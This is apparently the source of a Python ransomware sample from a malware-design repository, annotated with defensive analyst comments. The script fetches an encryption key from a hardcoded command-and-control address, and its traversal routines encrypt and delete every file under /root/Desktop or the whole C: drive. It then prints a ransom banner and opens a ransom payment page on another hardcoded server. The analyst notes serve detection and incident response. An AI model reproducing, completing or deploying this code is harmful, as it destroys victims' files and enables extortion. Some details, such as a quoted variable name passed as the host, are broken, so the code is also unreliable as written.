forked from sarthak1598/The-Malware-Design-Project
virus.py
# This is the malware code that is actually to be run on the victim's computer
# convert it to the exe before finally executing on the windows based operating system
# Malware is only for education purpose and learning/understanding the technical picture of the virus development .../
#! usr/bin/python
# Analyst notes (defensive reading of this listing):
# - Every statement from here down to sock.close() is module-level code, so it runs as
#   soon as the script starts, before any of the functions below is called.
# - Artefacts visible in this section: pip launched through os.system from a Python
#   process, one outbound TCP session, and the received key echoed to stdout.
import sys
import os
import time
##os.system("pip install socket && pip install cryptography") # installing the required python libraries ....
import socket
# Runtime dependency install: shells out to pip on every start. A Python process spawning
# a shell / pip is a usable process-lineage detection point.
os.system("pip install cryptography") # installing module in case it is not installed with the python package ...
from cryptography.fernet import Fernet
os.system("pip install wget")
# wget (like time above) is imported but not used anywhere in the visible listing.
import wget
# Initialising the socket
master_serverIP = "10.0.2.15" # The Attacker_server ip address to be hardcoded before finally propagating the malware...//
sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM) # tcp based command and control server controlled by the Attacker/Hacker
# The port is read from the first command-line argument (sys.argv[1]).
sock.connect(("master_serverIP" , int(sys.argv[1]))) # port is also needed to be hardcoded in the code ..
# `enter` is assigned but not used in the visible listing.
enter = "Running the malware..."
# NOTE(review): `exit` shadows the builtin of the same name for the rest of the module.
exit = "Data encrytion Started"
# The first read (up to 2048 bytes) is decoded and printed; the second read is kept as
# `key`, which the traversal functions below hand to Fernet.
print(sock.recv(2048).decode())
key = sock.recv(2048)
# Incident-response note: this is a plain socket.socket with no TLS wrapper in the listing,
# and the key is also printed. A packet capture of this session, or captured console
# output, would therefore contain the key material needed to decrypt affected files.
print(key)
sock.send(exit.encode())
sock.close()
# this function is platform independent as it is a data encryption AES function ...no interference with the operating system ...
# Analyst summary: reads the whole of file `name` into memory, encrypts it with
# Fernet(key), writes the result to `name + ".encrypted"` and then deletes the original.
# Parameters: key  - key material passed straight to Fernet()
#             name - path of the file to process
# Returns nothing.
# Detection/response: a burst of new "*.encrypted" files paired with deletion of the
# originals is the on-disk signature of this routine. The original is removed with
# os.remove and is not overwritten by this code, so backups, snapshots or file-recovery
# tooling may still hold the plaintext - confirm per filesystem.
def encrypt_all(key , name):
#if (name!="Ransomware.py"):
with open(name,'rb') as f:
data = f.read()
fernet = Fernet(key)
encrypted = fernet.encrypt(data)
# file extension modification after the file encryption completes in the victim's machine
encrypted_file = name + ".encrypted"
try:
with open(encrypted_file, 'wb') as f:
f.write(encrypted)
# original file removed by the operating system
os.remove(name)
# Bare except: whatever error is caught is reduced to the fixed message below, so the
# cause is not recorded anywhere.
except:
print("Operation not completed , due to some failure ")
# os file system traversal for the linux/unix based os
# Analyst summary: walks /root/Desktop recursively and passes every file found to
# encrypt_all() together with the module-level `key`. The extension filter is commented
# out, so no file type is excluded. Takes no arguments and returns nothing.
# Detection: each path is printed before it is processed, and the walk produces a
# sequential read / write / unlink pattern under that one directory tree.
def filelist_linux():
# declared mylist[] array to find and store all the desired extension files
# that are to be encrypted by the malware
# files containing array --->> List crypcrrp
#mylist = [".txt",".pdf","png","jpg","docx","doc","xls","ppt","pptx","rar","zip",".mp3",".wmv",".mp4"]
#mylist = [".html"]
for root, dirs, files in os.walk("/root/Desktop"):
for file in files:
# searching files of extensions given in the list above
# for ext in mylist:
# if file.endswith(ext):
ally = os.path.join(root, file)
print(ally)
# calling the function ..//>>
encrypt_all(key, ally)
# os file system --->> directory recursive traversal for windows based os ..
# Analyst summary: same loop as filelist_linux() but rooted at "c:/"; every file found is
# printed and passed to encrypt_all() with the module-level `key`. No extension or path
# filter is applied in this listing. Takes no arguments and returns nothing.
# Detection: one process opening, rewriting and deleting files across the whole drive in
# directory order is the behaviour that file-activity monitoring should alert on.
def filelist_windows():
for root, dirs, files in os.walk("c:/"):
for file in files:
ally = os.path.join(root,file)
print(ally)
# calling main malware function
encrypt_all(key, ally)
# function for checking the operating system first for the victim before executing the malware accordingly ..
# Analyst summary: dispatches on sys.platform. On "linux"/"linux2" it runs
# filelist_linux(), on "win32" it runs filelist_windows(); both branches then call
# final_action() and open a fixed URL in the default browser. The "darwin" branch does
# nothing. Takes no arguments and returns nothing.
# Indicators on the page: the URL http://192.168.43.230/ransom.html opened through
# webbrowser.open(..., new=2), i.e. a browser launched by the Python process immediately
# after the file activity. The address is a private-range value hard-coded by the author.
def OS_platform():
# importing the platform function from system library ...
from sys import platform
if platform == "linux" or platform == "linux2":
# linux os is running
# run function for linux file system --->> code !
filelist_linux() # malware in action !!!
final_action() # alert banner display
# REDIRECTING USER TO THE WEB BASED ALERT PAGE TO COLLECT RANSOM
# AND FOR DATA REVERT BACK PROCEDURE COMPLETION ....
import webbrowser
new=2;
url ="http://192.168.43.230/ransom.html"; # HACKER'S SERVER IP.
webbrowser.open(url, new=new);
elif platform == "darwin":
# some other x os is running
pass # till now for a reason for other os X
elif platform == "win32":
# windows os is running here ...
# here , run code for windows specific os file system ...
filelist_windows() # malware in action ..
final_action() # alert banner display
import webbrowser
new=2;
url ="http://192.168.43.230/ransom.html";
webbrowser.open(url, new=new);
# filelist_linux() # Executing the ransomware ...//::))
# Analyst summary: prints a fixed ransom notice to stdout and does nothing else; takes no
# arguments and returns nothing. The literal strings below are constant in the file, so
# they can serve as static string signatures when scanning for copies of this sample.
def ransom_banner():
print "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX!!!!!!1!!!WARNING!!!!!!!!!!!!XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX "
print " "
print "YOU ARE INFECTED WITH THE RAMSOMWARE VIRUS!!!! "
print " "
print "XXXXXXXXXXX!!All of your Important Data Have been encrypted!!!XXXXXXXXXXXX"
print " "
print "Pay the ransom to the given link to recover your encrypted data.../"
# Analyst summary: wrapper that only calls ransom_banner(). The pay_ransom() call is
# commented out and no such function is defined in the visible listing.
def final_action():
ransom_banner()
# pay_ransom() # disabled this function temporarily for the sake ..
# ransom payment function gateway to be developed ;
# define the function for collecting ransom and generating and verifying the user's password
# the end for now--->//